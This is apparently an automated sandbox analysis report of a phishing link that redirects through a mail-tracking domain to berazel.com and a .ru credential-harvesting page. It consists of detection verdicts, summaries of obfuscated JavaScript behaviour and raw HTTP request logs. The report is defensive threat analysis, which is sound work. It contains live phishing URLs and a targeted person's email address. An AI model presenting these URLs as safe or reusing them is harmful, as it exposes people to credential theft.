Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==

Overview

General Information

Sample URL:https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAA
Analysis ID:1578418
Infos:

Detection

HTMLPhisher
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1980,i,19504709162345292,12336163837026692061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_134JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_134, type: DROPPED
    Source: 1.11.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wv.itzraterbi.ru/xxABW/#Dktatroe@housingce... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. The script is highly suspicious and poses a significant security risk.
    Source: 1.10.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wv.itzraterbi.ru/xxABW/#Dktatroe@housingce... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a potentially malicious domain. The script also uses obfuscated variable names and setInterval to repeatedly execute a function that triggers a redirect. These behaviors are highly suspicious and indicate a strong likelihood of malicious intent.
    Source: 1.9.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wv.itzraterbi.ru/xxABW/#Dktatroe@housingce... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the behaviors may be related to legitimate functionality like analytics or error reporting, the overall level of suspicious activity is concerning and requires further investigation.
    Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://berazel.com/wellness/south/config.js... The provided script appears to be heavily obfuscated, which is a high-risk indicator. Additionally, it contains behaviors that suggest data exfiltration and potential redirection to malicious domains, both of which are also high-risk indicators. The combination of these factors, along with the overall suspicious nature of the script, results in a high-risk score of 9.
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://berazel.com/wellness/south/index#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==HTTP Parser: No favicon
    Source: https://wv.itzraterbi.ru/xxABW/#Dktatroe@housingcenter.comHTTP Parser: No favicon
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: go.eu.sparkpostmail1.com to https://berazel.com/wellness/south/index
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.1
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.1
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.1
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~ HTTP/1.1Host: go.eu.sparkpostmail1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wellness/south/index HTTP/1.1Host: berazel.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wellness/south/config.js HTTP/1.1Host: berazel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://berazel.com/wellness/south/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://berazel.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wellness/south/config.js HTTP/1.1Host: berazel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /media/GY70XKXXEAA_bbZ?format=jpg&name=large HTTP/1.1Host: pbs.twimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://berazel.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /housingcenter.com HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://berazel.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /media/GY70XKXXEAA_bbZ?format=jpg&name=large HTTP/1.1Host: pbs.twimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /housingcenter.com HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&co=aHR0cHM6Ly9iZXJhemVsLmNvbTo0NDM.&hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&size=normal&cb=c5wiie1kgy4z HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://berazel.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&co=aHR0cHM6Ly9iZXJhemVsLmNvbTo0NDM.&hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&size=normal&cb=c5wiie1kgy4zAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/bg/Xe7AbhhPfZcEikoNmhghBXAEhOusDIBKWKS_roS4Q7E.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&co=aHR0cHM6Ly9iZXJhemVsLmNvbTo0NDM.&hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&size=normal&cb=c5wiie1kgy4zAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/bg/Xe7AbhhPfZcEikoNmhghBXAEhOusDIBKWKS_roS4Q7E.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://berazel.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: berazel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://berazel.com/wellness/south/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6QB-xLWne_hEDWfQLtaaXIAmjra0Yu8cyWFqHWUIvK-sIL_JWaAR1nScLYHenHKcYJitr0hKm3HAXhFbXc_EKg4LBFbKroGCMf4Ru57BPA8nbWyamUlibCqmSl5FetcxEu7XgmTKmQ53DTV7WLK390J0d3liYPbUPlChD8XXJTZxLF0W65AgR-UzNdXgTinnpnX1gU&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6QB-xLWne_hEDWfQLtaaXIAmjra0Yu8cyWFqHWUIvK-sIL_JWaAR1nScLYHenHKcYJitr0hKm3HAXhFbXc_EKg4LBFbKroGCMf4Ru57BPA8nbWyamUlibCqmSl5FetcxEu7XgmTKmQ53DTV7WLK390J0d3liYPbUPlChD8XXJTZxLF0W65AgR-UzNdXgTinnpnX1gU&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA4zoaFDNqO6EzovS0z4d28jooK4dChq1FVzINjqws77O5XliAiRm6JwAXJIelvyPaGA7eyHEScZ9B-2Dt4fZCirlp1hgSqfhqjExzgZHyhA1pkWUqTxGRIt7UmGqcBJiJ7SX6HXfXTtlRXPSEBLBuGHTqFUCB0V5kKhRcw4srZx1LAMU3_TJaeV0lty1k1XFUaro2-L&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=cbb98b901b4c82b5 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
